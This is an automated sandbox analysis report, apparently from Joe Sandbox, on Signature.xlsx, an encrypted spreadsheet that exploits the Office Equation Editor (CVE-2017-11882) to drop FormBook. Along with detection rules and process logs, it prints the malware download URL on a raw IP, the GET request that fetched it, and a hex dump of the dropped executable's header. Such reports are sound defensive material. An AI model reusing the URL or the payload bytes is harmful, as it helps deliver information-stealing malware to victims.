Play interactive tour

Edit tour

Analysis Report Signature.xlsx

Overview

General Information

Sample Name:	Signature.xlsx
Analysis ID:	345177
MD5:	560a48512736572ec4abceb4ecf22250
SHA1:	56798f4c080101515e42b5678a2039ac6b8caaf3
SHA256:	1d93a4fcbcf81b40332da7aedaa9288ca16a2c0c588db5c78c6e349ce53478d4
Tags:	VelvetSweatshopxlsx
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected AntiVM_3

Yara detected FormBook

Drops PE files to the user root directory

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 152 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2332 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2852 cmdline: 'C:\Users\Public\vbc.exe' MD5: BE84C387975B024F25DC96EC5F85F7BD)

vbc.exe (PID: 2876 cmdline: C:\Users\Public\vbc.exe MD5: BE84C387975B024F25DC96EC5F85F7BD)

vbc.exe (PID: 2468 cmdline: C:\Users\Public\vbc.exe MD5: BE84C387975B024F25DC96EC5F85F7BD)

vbc.exe (PID: 2460 cmdline: C:\Users\Public\vbc.exe MD5: BE84C387975B024F25DC96EC5F85F7BD)

vbc.exe (PID: 2424 cmdline: C:\Users\Public\vbc.exe MD5: BE84C387975B024F25DC96EC5F85F7BD)

vbc.exe (PID: 2420 cmdline: C:\Users\Public\vbc.exe MD5: BE84C387975B024F25DC96EC5F85F7BD)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x293d58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2940e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x29fdf5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x29f8e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x29fef7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2a006f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x294afa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x29eb5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x295872:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2a4ee7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2a5f8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x2a1e19:$sqlite3step: 68 34 1C 7B E1 0x2a1f2c:$sqlite3step: 68 34 1C 7B E1 0x2a1e48:$sqlite3text: 68 38 2A 90 C5 0x2a1f6d:$sqlite3text: 68 38 2A 90 C5 0x2a1e5b:$sqlite3blob: 68 53 D8 7F 8C 0x2a1f83:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: vbc.exe PID: 2852	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2852

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 18.194.54.219, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2332, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2332, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm1[1].exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://18.194.54.219/wows/hm1.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: http://18.194.54.219/wows/hm1.exe

Virustotal: Detection: 7%

Perma Link

Yara detected FormBook

Show sources

Source: Yara match

File source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm1[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 18.194.54.219:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 18.194.54.219:80

Networking:

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Jan 2021 19:02:53 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Wed, 27 Jan 2021 13:44:17 GMTETag: "9ac00-5b9e1f7b0f5e7"Accept-Ranges: bytesContent-Length: 633856Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 6d 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 a2 09 00 00 08 00 00 00 00 00 00 2e c1 09 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c0 09 00 57 00 00 00 00 e0 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a1 09 00 00 20 00 00 00 a2 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 e0 09 00 00 06 00 00 00 a4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 aa 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c1 09 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 7e 08 00 f0 41 01 00 03 00 00 00 01 00 00 06 ec 8e 02 00 f8 ef 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 23 00 00 00 00 00 00 00 2b 02 26 16 00 00 28 01 00 00 0a 28 02 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 03 00 00 0a 00 2a 00 01 10 00 00 02 00 05 00 0e 13 00 02 00 00 00 00 13 30 02 00 01 01 00 00 01 00 00 11 2b 02 26 16 00 38 e8 00 00 00 02 16 38 c7 00 00 00 00 2b 35 06 1f 56 61 0a 2b 1e 07 1f 60 61 0b 07 1f 53 59 45 04 00 00 00 05 00 00 00 10 00 00 00 17 00 00 00 4d 00 00 00 1f 35 0b 2b dd d0 01 00 00 06 26 1f 33 0b 2b d2 17 0a 1f 36 0b 2b cb 06 1f 4f 59 45 0a 00 00 00 07 00 00 00 0c 00 00 00 19 00 00 00 27 00 00 00 2f 00 00 00 37 00 00 00 45 00 00 00 4e 00 00 00 68 00 00 00 7f 00 00 00 1f 34 0b 2b 95 2b 8c 00 18 0a 2b 87 d0 03 00 00 06 26 1c 0a 38 7a ff ff ff 02 16 28 07 00 00 0a 19 0a 38 6c ff ff ff 00 1d 0a 38 64 ff ff ff 00 16 0a 38 5c ff ff ff 02 17 28 08 00 00 0a 1b 0a 38 4e ff ff ff 00 1f 0e 0a 38 45 ff ff ff 02 17 28 09 00 00 0a 2b 0a 28 0a 00 00

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Source: global traffic

HTTP traffic detected: GET /wows/hm1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.194.54.219Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E74B891E.emf

Jump to behavior

Source: global traffic

Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, vbc.exe, 00000005.00000002.2157599757.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2158308519.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000007.00000002.2159068648.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000008.00000002.2159827958.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000009.00000002.2161125989.0000000000212000.00000020.00020000.sdmp, vbc.exe.2.dr	String found in binary or memory: http://thesnake.herokuapp.com/snakes
Source: E74B891E.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match

File source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm1[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A3519	4_2_003A3519
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A3808	4_2_003A3808
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003ADA91	4_2_003ADA91
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A3AC0	4_2_003A3AC0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003ABAC0	4_2_003ABAC0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A57E0	4_2_003A57E0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A57DD	4_2_003A57DD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A5A38	4_2_003A5A38
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003ADAD2	4_2_003ADAD2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A8D46	4_2_003A8D46

Source: Signature.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: hm1[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@14/6@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Signature.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR59B.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Signature.xlsx

Static file information: File size 2493440 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: Signature.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Signature.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Source: initial sample	Static PE information: section name: .text entropy: 7.41524464929
Source: initial sample	Static PE information: section name: .text entropy: 7.41524464929

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm1[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Signature.xlsx

Stream path 'EncryptedPackage' entropy: 7.99993201198 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2852, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
